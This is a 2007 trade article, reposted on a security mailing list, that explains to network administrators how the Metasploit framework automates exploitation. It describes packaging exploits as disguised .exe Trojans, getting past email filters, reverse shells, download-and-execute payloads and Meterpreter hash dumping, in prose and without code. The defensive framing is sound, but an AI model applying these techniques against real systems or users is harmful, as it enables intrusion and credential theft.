[Infowarrior] - Metasploit: Join the Arms Race

[Richard Forno]

Metasploit: Join the Arms Race
July 3, 2007
By Paul Rubens

Paul Rubens

http://www.enterprisenetworkingplanet.com/netsecur/article.php/3687001


What's the biggest threat to your organization's network? Arguably, it's
Metasploit, an easy to use hacking system that reduces the job of
compromising of computers to a simple point and click exercise.

"Metasploit is a genius concept to standardize the development and use of
exploits so anyone can use them," says Mati Aharoni, one of the experts
behind BackTrack 2, a security oriented Linux distribution based on Slax.
"It is a brilliant system, especially for penetration testers, and it has
become the number one tool for every security and analysis person."

The problem is that Metasploit is freely available to hackers as well as
security pros. It's a bit like an arms race then: if the baddies are armed
with Metasploit, then you better make sure that you have it too. If not,
you'll be the digital equivalent of outgunned.

One of the biggest innovations of the latest version of Metasploit,
Framework 3, is the db_autopwn feature, a database driven process which
scans your network and compromises as many machines as it can automatically
using any of the current Metasploit exploits. This is certainly worth trying
out on your network because if it succeeds it means you have security
problems that anyone running Framework 3 will find without any hacking
skills at all. (In fact, if you are going to do this to your own network
read up on it first ­ some of db_autopwn's actions could crash your machines
if they're vulnerable.) There are other powerful penetration testing
programs that can "hack" a network automatically ­ notably Core Security's
Core Impact ­ but none that are freely available like Metasploit.

For added flexibility, Metasploit also allows users to build their own
bespoke attacks. A hacker may discover, using any number of methods
(including scanning or asking staff members), that you have a machine on
your network susceptible to one of the nearly 200 exploits currently
included in Framework 3 ­perhaps a buffer overflow error which allows an
attacker to insert and execute arbitrary code. The next question is what
arbitrary code ­ or payload - should the hacker insert? The particular
overrun may offer just 800 bytes in which to insert code, but this is more
than enough for just about all of the payloads supplied with Metasploit.

So once an attacker has found a vulnerability and selected a payload, and
after supplying a few other parameters ­ such as the IP address of the
machine to be attacked or his own machine, depending on the payload - he is
ready to perform the exploit.

Or is he? What happens if the attacker has no obvious way of accessing the
machine he wants to compromise directly? One answer is to use Metasploit's
little known option X. Instead of performing an exploit immediately,
Metasploit provides the option ­ option X ­ of turning the entire exploit,
complete with payload and all the other parameters required, into a PE, or
Portable Executable .exe file. So all a hacker needs to do is give the file
some suitably innocuous name like update.exe, and email it to the victim
computer. He'll need some social engineering skills to get the recipient to
double click on it, and that, as they say, will be that: the machine will
run the payload and be well and truly pwned.

Your users will doubtless have been trained never to click on .exe files
they receive by email, and with any luck your email filters would stop them
being delivered anyway. But it's a simple matter to change a file extension
to foil an email filter, and if social engineering can be used to get
someone to double click on a file it can certainly be used to get someone to
rename a file as an executable.

So it's important to realize that, with the help of Metasploit, making this
type of Trojan file is really not hard at all. If you are aware of this then
at least you can think about the steps you need to take to prevent your
users from falling victim to one.

If they do fall victim, what kind of payloads might be run on their system
using Metasploit? When a machine is compromised by a Metasploit user, what
are the implications?

Metasploit has payloads for a variety of OSes including Windows, Linux, OS
X, BSD and Solaris. The most basic payload is a simple bind shell: an
attacker's machine connects to the victim machine and gets a command prompt.
There's also a reverse attack, causing the compromised machine to connect
back to the attacker and spawn a command shell. With the command shell the
hacker can do anything someone sitting at the machine could do, with the
privileges of the current user.

But there are also more insidious payloads which cause an exploited machine
to download an .exe file from a given URL and execute it, or which inject a
VNC server onto a compromised machine and connect back to the attacker,
providing him with a full color remote desktop experience on the compromised
machine.

Perhaps the most flexible payload is the Meterpreter "uber-payload," a kind
of extensible command shell which an attacker can use to get up to all kinds
of mischief. With a Meterpreter shell in place an attacker can use upload
and download commands to move files to and from the compromised computer
from his own machine. The SAM Meterpreter extension (at the time of writing
only available using the older Metasploit Framework 2) also enables a
"gethashes" command to easily dump the password hashes from the exploited
machine's SAM on to the attacker's machine for cracking.

It's pretty clear from this that Metasploit, in the wrong hands, could be
used to do a great deal of damage to the machines under your care, so do
yourself a favor and make sure the odds aren't stacked against you. Get
yourself a copy (it runs on Linux or Windows, and even the tiny handheld
Nokia N800 Linux device) and see what vulnerabilities it can exploit before
someone else does. You can use this knowledge to put things right. Other
Metasploit users exploring your network might not be so kind.